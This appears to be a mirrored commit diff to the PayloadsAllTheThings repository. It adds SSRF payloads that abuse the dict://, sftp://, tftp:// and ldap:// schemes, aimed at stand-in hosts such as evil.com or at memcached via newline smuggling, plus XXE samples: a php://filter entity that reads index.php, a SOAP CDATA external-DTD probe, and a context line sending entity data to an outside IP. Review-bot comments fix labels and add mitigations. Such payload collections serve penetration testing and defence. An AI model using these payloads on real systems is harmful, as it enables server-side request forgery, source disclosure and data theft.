mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
SSRF URL Scheme + XXE Soap
This commit is contained in:
parent
91e3c6906c
commit
9adb81e6d8
@ -71,7 +71,33 @@ requests + browsers : 2.2.2.2
|
|||||||
urllib : 3.3.3.3
|
urllib : 3.3.3.3
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SSRF via URL Scheme
|
||||||
|
Dict://
|
||||||
|
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
|
||||||
|
```
|
||||||
|
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
|
||||||
|
ssrf.php?url=dict://attacker:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Sftp://
|
||||||
|
```
|
||||||
|
ssrf.php?url=sftp://evil.com:11111/
|
||||||
|
```
|
||||||
|
|
||||||
|
Tftp://
|
||||||
|
```
|
||||||
|
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
|
||||||
|
```
|
||||||
|
|
||||||
|
Ldap://
|
||||||
|
```
|
||||||
|
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||||
|
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
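Review bot: The `Ldap://` example is mislabelled: the target is `localhost:11211` (memcached's default port) and `%0astats%0aquit` is the memcached text protocol (`stats`, `quit`) smuggled through the newlines in the URL path, so nothing LDAP is actually spoken. The heading should say so, for example `Ldap:// (newline smuggling to memcached)`, or readers will assume `stats`/`quit` are LDAP operations. Two style points for the same hunk: `Dict://`, `Sftp://`, `Tftp://` and `Ldap://` are bare text lines under the `## SSRF via URL Scheme` heading while the file's existing headings use `##`, so they should be real sub-headings (`### Dict://` and so on); and the section would benefit from one line on the defence that all four payloads share, namely that the server-side fetcher should accept only an allowlist of schemes (`http`, `https`) and validate the resolved host before and after any redirect, since the whole point of these payloads is the non-HTTP scheme.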
10
XXE injections/Files/XXE PHP Wrapper.xml
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
||||||
|
<contacts>
|
||||||
|
<contact>
|
||||||
|
<name>Jean &xxe; Dupont</name>
|
||||||
|
<phone>00 11 22 33 44</phone>
|
||||||
|
<adress>42 rue du CTF</adress>
|
||||||
|
<zipcode>75000</zipcode>
|
||||||
|
<city>Paris</city>
|
||||||
|
</contact>
|
||||||
|
</contacts>
|
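Review bot: The DOCTYPE name does not match the root element: `<!DOCTYPE replace [...]>` declares `replace` as the document element, but the root is `<contacts>`. Non-validating parsers ignore the mismatch, while a validating parser rejects the document before `&xxe;` is ever expanded, so the sample should read `<!DOCTYPE contacts [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>`. `<adress>` is also misspelled (`<address>`); harmless to the parser, but these files get copied verbatim into test cases. A one-line comment at the top stating that the file demonstrates source disclosure through PHP's `php://filter` stream wrapper, and that the fix on the receiving side is to keep external entity loading off (in PHP, `libxml_disable_entity_loader(true)` and never passing `LIBXML_NOENT`), would make the sample self-explanatory.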
@ -96,6 +96,13 @@ File stored on http://92.222.81.2/dtd.xml
|
|||||||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XXE Inside SOAP
|
||||||
|
```
|
||||||
|
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
||||||
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
|
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
|
||||||
|
* https://gist.github.com/staaldraad/01415b990939494879b4
|
||||||
|
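Review bot: The SOAP payload only works under a precondition the section does not state. Inside `<![CDATA[ ... ]]>` the `<!DOCTYPE ...>` is character data, not markup, so the SOAP parser itself never sees a DTD; the entity is resolved only when the application extracts the CDATA string and hands it to a second XML parser with DTD processing enabled (a DOCTYPE is only legal in the prolog, so an unwrapped one in the body would be a well-formedness error). The text should say "for applications that re-parse the CDATA content", and since the declaration is a parameter entity fetching `http://x.x.x.x:22/`, it should note that this is a blind/out-of-band probe rather than data exfiltration. Style: `XXE Inside SOAP` is a bare line while the file's other headings use `##`, so it should be `## XXE Inside SOAP`. The mitigation belongs in the same paragraph: DTDs must be disabled on every parser in the chain, not only on the SOAP endpoint's.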